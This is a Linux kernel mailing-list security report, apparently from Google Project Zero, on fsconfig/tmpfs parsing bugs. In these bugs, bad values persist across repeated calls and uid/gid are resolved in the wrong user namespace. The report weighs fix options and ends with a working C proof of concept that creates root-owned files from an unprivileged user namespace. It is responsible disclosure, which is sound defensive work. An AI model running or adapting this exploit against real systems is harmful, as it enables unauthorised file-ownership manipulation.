fsconfig parsing bugs

Seth Jenkins <sethjenkins@xxxxxxxxxx> · Wed, 31 Aug 2022 16:12:21 -0700

The codebase-wide refactor efforts to using the latest fs mounting API
(with support for fsopen/fsconfig/fsmount etc.) have introduced some
bugs into mount configuration parsing in several parse_param handlers,
most notably shmem_parse_one() which can be accessed from a userns.
There are several cases where the following code pattern is used:

ctx->value = <expression>
if(ctx->value is invalid)
   goto fail;
ctx->seen |= SHMEM_SEEN_X;
break;

However, this coding pattern does not work in the case where multiple
fsconfig calls are made. For example, if I were to call fsconfig with
the key "nr_blocks" twice, the first time with a valid value, and the
second time with an invalid value, the invalid value will be persisted
and used upon creation of the mount for the value of ctx->blocks, and
consequently for sbinfo->max_blocks.

This code pattern is used for Opt_nr_blocks, Opt_nr_inodes, Opt_uid,
Opt_gid and Opt_huge. Probably the proper thing to do is to check for
validity before assigning the value to the shmem_options struct in the
fs_context.

We also see this code pattern replicated throughout other filesystems
for uid/gid resolution, including hugetlbfs, FUSE, ntfs3 and ffs.

The other outstanding issue I noticed comes from the fact that
fsconfig syscalls may occur in a different userns than that which
called fsopen. That means that resolving the uid/gid via
current_user_ns() can save a kuid that isn't mapped in the associated
namespace when the filesystem is finally mounted. This means that it
is possible for an unprivileged user to create files owned by any
group in a tmpfs mount (since we can set the SUID bit on the tmpfs
directory), or a tmpfs that is owned by any user, including the root
group/user. This is probably outside the original intention of this
code.

The fix for this bug is not quite so simple as the others. The options
that I've assessed are:

- Resolve the kuid/kgid via the fs_context namespace - this does
however mean that any task outside the fsopen'ing userns that tries to
set the uid/gid of a tmpfs will have to know that the uid/gid will be
resolved by a different namespace than that which the current task is
in. It also subtly changes the behavior of this specific subsystem in
a userland visible way.
- Globally disallow fsconfig calls originating from outside the
fs_context userns - This is a more robust solution that would prevent
any similar bugs, but it may impinge on valid mount use-cases. It's
the best from a security standpoint and if it's determined that it was
not in the original intention to be juggling user/mount namespaces
this way, it's probably the ideal solution.
- Throw EINVAL if the kuid specified cannot be mapped in the mounting
userns (and/or potentially in the fs_context userns) - This is
probably the solution that remains most faithful to all potential
use-cases, but it doesn't reduce the potential for variants in the
future in other parts of the codebase and it also introduces some
slight derivative logic bug risk.
- Don't resolve the uid/gid specified in fsconfig at all, and resolve
it during mount-time when calling an associated fill_super. This is
precedented and used in other parts of the codebase, but specificity
is lost in the final error case since an end-user cannot easily
attribute a mount failure to an unmappable uid.

I've also attached a PoC for this bug that demonstrates that an
unprivileged user can create files/directories with root uid/gid's.
There is no deadline for this issue as we can't see any obvious way to
cross a privilege boundary with this.

Thanks in advance!
--

Seth Jenkins
Information Security Engineer
Google Project Zero
sethjenkins@xxxxxxxxxx
#define _GNU_SOURCE
#include <errno.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sched.h>
#include <string.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mount.h>
#define FSCONFIG_SET_STRING 1
#define FSCONFIG_CMD_CREATE 6
//#define MS_NODEV 4
#define MOVE_MOUNT_F_EMPTY_PATH		0x00000004 /* Empty from path permitted */

int fsopen(char* fs,unsigned long flags) {
	return syscall(430,fs,flags);
}
int fsconfig(int fd, unsigned int cmd, char* key, char* value, int aux) {
	return syscall(431,fd,cmd,key,value,aux);
}
int fsmount(int fd, unsigned int flags, unsigned int mount_attrs) {
	return syscall(432,fd,flags,mount_attrs);
}
int move_mount(int from_dirfd, const char *from_pathname,
                      int to_dirfd, const char *to_pathname,
                      unsigned int flags) {
	return syscall(429,from_dirfd,from_pathname,to_dirfd,to_pathname,flags);
}
static int childFunc(void* arg) {
	mkdir("tmpfs",0777);
	int fd = fsopen("tmpfs",0);
	if(fd < 0) {
		printf("fsopen: %m\n");
		return 1;
	}
	printf("fs fd: %d\n",fd);
	sleep(2);

	if(fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0)) {
		printf("fsconfig %m\n");
		return 0;
	}

	int mountfd = fsmount(fd,0,MS_NODEV);
	if(mountfd == -1) {
		printf("fsmount: %m\n");
		return 0;
	}
	if(move_mount(mountfd,"",AT_FDCWD,"./tmpfs",MOVE_MOUNT_F_EMPTY_PATH)) {
		printf("move_mount: %m\n");
		return 0;
	}
	system("mount");
	int final_fd = creat("./tmpfs/testfile",O_RDWR);
	if(final_fd == -1) {
		printf("open: %m\n");
		exit(1);
	}
	int dir_fd = open("./tmpfs",O_RDONLY | O_DIRECTORY);
	if(dir_fd == -1) {
		printf("opendir: %m\n");
		exit(1);
	}
	sleep(5);
	exit(0);
}
#define STACK_SIZE (1024 * 1024)

int main() {
        char* stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
        if (stack == MAP_FAILED)
               printf("mmap: %m\n");

        char* stackTop = stack + STACK_SIZE;

        pid_t pid = clone(childFunc, stackTop, CLONE_FILES | CLONE_NEWUSER | CLONE_NEWNS, NULL);
	sleep(1);
	char uidgidfile[64];
	char map[64];

	sprintf(uidgidfile,"/proc/%d/uid_map",pid);
	int uid_map_fd = open(uidgidfile,O_WRONLY);
	sprintf(map,"0 %d 1",getuid());
	if(write(uid_map_fd,map,strlen(map)) < 0) {
		printf("write uid_map: %m\n");
		exit(1);
	}
	close(uid_map_fd);

	sprintf(uidgidfile,"/proc/%d/setgroups",pid);
	int setgroups_fd = open(uidgidfile,O_WRONLY);
	if(write(setgroups_fd,"deny",4) < 0) {
		printf("write setgroups: %m\n");
		exit(1);
	}
	close(setgroups_fd);

	sprintf(uidgidfile,"/proc/%d/gid_map",pid);
	int gid_map_fd = open(uidgidfile,O_WRONLY);
	sprintf(map,"0 %d 1",getgid());
	if(write(gid_map_fd,map,strlen(map)) < 0) {
		printf("write gid_map: %m\n");
		exit(1);
	}
	close(gid_map_fd);

	//Please don't run this program with extra fd's
	int fs_fd = 3;
	//It's dirty but who cares. Just waiting for fsopen to happen on child side.
	while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"uid","0",0));
	printf("fsconfig uid set: %m\n");
	while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"gid","0",0));
	printf("fsconfig gid set: %m\n");
	while(errno = 0,fsconfig(fs_fd,FSCONFIG_SET_STRING,"mode","7777",0));
	printf("mode set: %m\n");
	int created_file_fd = 5;
	struct stat statbuf;
	puts("waiting for created file...");
	while(fstat(created_file_fd,&statbuf));
	printf("init_ns owned uid: %d\n",statbuf.st_uid);
	printf("init_ns owned gid: %d\n",statbuf.st_gid);
	int tmpfs_dir_fd = 6;
	while(fstat(tmpfs_dir_fd,&statbuf));
	printf("init_ns dir owned uid: %d\n",statbuf.st_uid);
	printf("init_ns dir owned gid: %d\n",statbuf.st_gid);
}